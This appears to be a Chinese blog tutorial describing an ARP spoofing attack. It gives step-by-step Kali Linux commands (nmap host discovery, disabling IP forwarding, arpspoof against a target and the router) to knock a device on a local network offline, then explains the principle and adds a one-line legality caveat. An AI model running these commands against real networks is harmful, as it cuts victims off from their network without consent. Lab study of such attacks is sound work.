ARP欺骗使局域网内设备断网

2024-05-04 15:04

本文主要是介绍ARP欺骗使局域网内设备断网,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

一、实验准备

  1. kali系统:可使用虚拟机软件模拟
    kali虚拟机镜像链接:https://www.kali.org/get-kali/#kali-virtual-machines
    注意虚拟机网络适配器采用桥接模式
    在这里插入图片描述

  2. 局域网内存在指定断网的设备

二、实验步骤

  1. 打开kali系统命令行:ctrl+alt+t可快速打开终端

  2. 切换到root用户

    sudo su
    
  3. 查看当前网段

    ifconfig
    

    inet 192.168.10.145 netmask 255.255.255.0
    表明当前网段为192.168.10.0

  4. 查看当前路由器ip地址

    ip route
    

    default via 192.168.10.1 dev eth0 proto dhcp src 192.168.10.145 metric 100
    192.168.10.0/24 dev eth0 proto kernel scope link src 192.168.10.145 metric 10
    表明路由器ip为192.168.10.1

  5. 扫描查看目标设备ip

    nmap -sn 192.168.10.1/24  # 使用 Nmap 发现网络中的活动主机,等效于nmap -sn 192.168.10.1-255
    

    根据设备名称找到对应ip

  6. 设置kali系统不转发数据

    echo 0 > /proc/sys/net/ipv4/ip_forward
    
  7. 执行arp欺骗

    arpspoof -i eth0 -t 192.168.10.137 -r 192.168.10.1
    
    • -i: 指定使用的网卡
    • -t:指定欺骗的设备ip地址
    • -r:指定欺骗的路由器ip地址
  8. 目标设备无法获取新数据

三、原理

ARP欺骗

  1. 复制路由器mac地址,伪装为路由器并通知目标设备,以便后续目标设备将数据交给kali
  2. 复制目标设备mac地址,伪装为目标设备并通知路由器,以便后续路由器将数据交给kali
  3. 但kali设置不转发数据,因此路由器和目标设备发送至kali的所有数据均被抛弃,致使目标设备无法与路由器沟通无法获取数据

四、特别注意

请在合法场景下进行实验

这篇关于ARP欺骗使局域网内设备断网的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/959476

相关文章

如何通过海康威视设备网络SDK进行Java二次开发摄像头车牌识别详解

《如何通过海康威视设备网络SDK进行Java二次开发摄像头车牌识别详解》:本文主要介绍如何通过海康威视设备网络SDK进行Java二次开发摄像头车牌识别的相关资料,描述了如何使用海康威视设备网络SD... 目录前言开发流程问题和解决方案dll库加载不到的问题老旧版本sdk不兼容的问题关键实现流程总结前言作为

C/C++通过IP获取局域网网卡MAC地址

《C/C++通过IP获取局域网网卡MAC地址》这篇文章主要为大家详细介绍了C++如何通过Win32API函数SendARP从IP地址获取局域网内网卡的MAC地址,感兴趣的小伙伴可以跟随小编一起学习一下... C/C++通过IP获取局域网网卡MAC地址通过win32 SendARP获取MAC地址代码#i

Python实现局域网远程控制电脑

《Python实现局域网远程控制电脑》这篇文章主要为大家详细介绍了如何利用Python编写一个工具,可以实现远程控制局域网电脑关机,重启,注销等功能,感兴趣的小伙伴可以参考一下... 目录1.简介2. 运行效果3. 1.0版本相关源码服务端server.py客户端client.py4. 2.0版本相关源码1

如何编写Linux PCIe设备驱动器 之二

如何编写Linux PCIe设备驱动器 之二 功能(capability)集功能(capability)APIs通过pci_bus_read_config完成功能存取功能APIs参数pos常量值PCI功能结构 PCI功能IDMSI功能电源功率管理功能 功能(capability)集 功能(capability)APIs int pcie_capability_read_wo

ja-netfilter的前世今生和非对称加密的欺骗原理

文章目录 ja-netfilter起源官网插件插件配置文件插件的综合应用更多用法 非对称加密欺骗原理非对称加密和数字证书激活过程和欺骗手段分析代码示例第一步:生成自签名证书脚本第二步:使用自签名证书对产品激活信息进行签名 样例数据样例激活码(注:用于代码演示,直接粘贴到JetBrains 家 IDE 中无法完成激活!不用试,肯定提示无效,无法激活!!)样例power.conf(配合ja-ne

文章解读与仿真程序复现思路——电力自动化设备EI\CSCD\北大核心《考虑燃料电池和电解槽虚拟惯量支撑的电力系统优化调度方法》

本专栏栏目提供文章与程序复现思路,具体已有的论文与论文源程序可翻阅本博主免费的专栏栏目《论文与完整程序》 论文与完整源程序_电网论文源程序的博客-CSDN博客https://blog.csdn.net/liang674027206/category_12531414.html 电网论文源程序-CSDN博客电网论文源程序擅长文章解读,论文与完整源程序,等方面的知识,电网论文源程序关注python

全英文地图/天地图和谷歌瓦片地图杂交/设备分布和轨迹回放/无需翻墙离线使用

一、前言说明 随着风云局势的剧烈变化,对我们搞软件开发的人员来说,影响也是越发明显,比如之前对美对欧的软件居多,现在慢慢的变成了对大鹅和中东以及非洲的居多,这两年明显问有没有俄语或者阿拉伯语的输入法的增多,这要是放在2019年以前,一年也遇不到一个人问这种需求场景的。 地图应用这块也是,之前的应用主要在国内,现在慢慢的多了一些外国的应用场景,这就遇到一个大问题,我们平时主要开发用的都是国内的地

驱动(RK3588S)第七课时:单节点设备树

目录 需求一、设备树的概念1、设备树的后缀名:2、设备树的语法格式3、设备树的属性(重要)4、设备树格式举例 二、设备树所用函数1、如何在内核层种获取设备树节点:2、从设备树上获取 gpio 口的属性3、获取节点上的属性只针对于字符串属性的4、函数读取 np 结点中的 propname 属性的值,并将读取到的 u32 类型的值保存在 out_value 指向的内存中,函数的返回值表示读取到的

9.7(UDP局域网多客户端聊天室)

服务器端 #include<myhead.h>#define SERIP "192.168.0.132"#define SERPORT 8888#define MAX 50//定义用户结构体typedef struct{struct sockaddr_in addr;int flag;}User;User users[MAX];//用户列表void add_user(struct s

海鲜加工污水处理设备处理效果高

诸城市鑫淼环保小编带大家了解一下海鲜加工污水处理设备处理效果高   海鲜加工污水处理设备通常采用物理、化学和生物处理相结合的方法,对废水中的污染物进行高xiao去除。设备设计紧凑,占地面积小,操作简便,适用于不同规模的海鲜加工厂。   设备特点   高xiao性:采用先进的处理工艺和技术,确保废水处理效果稳定可靠。   占地面积小:设备设计紧凑,占地面积小,适合在有限的空间内安装。